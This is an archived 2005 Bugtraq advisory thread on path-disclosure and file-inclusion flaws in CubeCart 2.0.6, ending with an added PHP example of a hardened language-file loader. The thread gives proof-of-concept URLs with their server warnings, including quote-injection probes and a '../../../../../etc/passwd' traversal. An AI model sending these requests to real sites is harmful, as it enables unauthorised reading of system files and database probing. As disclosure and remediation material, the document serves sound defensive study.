RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure
Hi Ravish,
This only happens on older versions, it was fixed in 2.0.5. (see
[NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities)
The only other thing an attacker could do is to include a .php file
somewhere else on the server.
For example, if the attacker also had his/her website on that same server
and knew the full path to it, they could use file inclusion to launch an
'evil' .php file from their home folder.
Regards
John
www.NoBytes.com
Web Design, Web Hosting, Hardware, Software, You Name it, if it's to do with
IT we can sort it.
-----Original Message-----
From: Ravish Ahuja [mailto:ravish@xxxxxxxxxxx]
Sent: 06 April 2005 20:44
To: 'John Cobb'; bugtraq@xxxxxxxxxxxxxxxxx
Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure
Hello,
http://www.victimsite.com/index.php?&language=f00bar.php
Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147
This is path disclosure but it can also be used for malicious file include.
http://www.victimsite.com/index.php?language=../../../../../etc/passwd
Regards,
Ravish
http://www.xeonext.com
-----Original Message-----
From: John Cobb [mailto:johnc@xxxxxxxxxxx]
Sent: Sunday, February 06, 2005 11:09 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure
Hello All,
I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6.
Authors Site: http://www.cubecart.com
CubeCart is described by its authors as:
'What is CubeCart?
CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you
can setup a powerful online store as long as you have hosting supporting PHP
and one MySQL database.'
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
http://www.victimsite.com/index.php?&language=f00bar.php
Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147
[2]------------------------------------------------------------+
http://www.victimsite.com/index.php?&PHPSESSID='
Warning: Failed to write session data (files). Please verify that the
current setting of session.save_path is correct (/tmp) in Unknown on line 0
[3]------------------------------------------------------------+
http://www.victimsite.com/tellafriend.php?&product='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/tellafriend.php on line 46
[4]------------------------------------------------------------+
http://www.victimsite.com/view_cart.php?add='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_cart.php on line 49
[5]------------------------------------------------------------+
http://www.victimsite.com/view_product.php?product='
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 53
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 63
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 144
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 05/03/2005
Author(s) Informed on: 05/03/2005
Author(s) Response: 05/03/2005
Author(s) Fix: 05/04/2005
Regards
John Cobb
JohnC@xxxxxxxxxxx
http://www.NoBytes.com
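
Added example, not part of the original thread and not CubeCart's own code: one way to handle a request-supplied language value like the one in example [1], so that it can only select an existing language file and a failed lookup does not print a path-revealing warning. The directory layout, the constants and resolve_language_file() are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened loader, not CubeCart's own code.
// Assumption: language files are stored as <name>.php in one directory.
const LANG_DIR = __DIR__ . '/lang';
const DEFAULT_LANG = 'en';

// Production setting: log warnings instead of printing server paths.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Map a request-supplied language name to a file inside $langDir,
// falling back to the default language for anything unexpected.
function resolve_language_file(?string $requested, string $langDir = LANG_DIR): string
{
    $fallback = $langDir . '/' . DEFAULT_LANG . '.php';

    // 1. Syntax check: a short token with no dots, slashes or NUL bytes.
    if ($requested === null || !preg_match('/\A[A-Za-z0-9_-]{1,16}\z/', $requested)) {
        return $fallback;
    }

    // 2. Allowlist: only names of files that really exist in the directory.
    $allowed = [];
    foreach (glob($langDir . '/*.php') ?: [] as $path) {
        $allowed[basename($path, '.php')] = $path;
    }
    if (!isset($allowed[$requested])) {
        return $fallback;
    }

    // 3. Defence in depth: the resolved path (symlinks followed) must stay inside.
    $base = realpath($langDir);
    $real = realpath($allowed[$requested]);
    if ($base === false || $real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return $fallback;
    }
    return $real;
}

// Constructed demo: a temporary language directory plus the two values from the thread.
$dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
if (!is_dir($dir)) { mkdir($dir); }
file_put_contents("$dir/en.php", "<?php // constructed sample\n");
file_put_contents("$dir/de.php", "<?php // constructed sample\n");
foreach (['de', 'f00bar.php', '../../../../../etc/passwd', null] as $input) {
    printf("%-30s => %s\n", var_export($input, true), basename(resolve_language_file($input, $dir)));
}
```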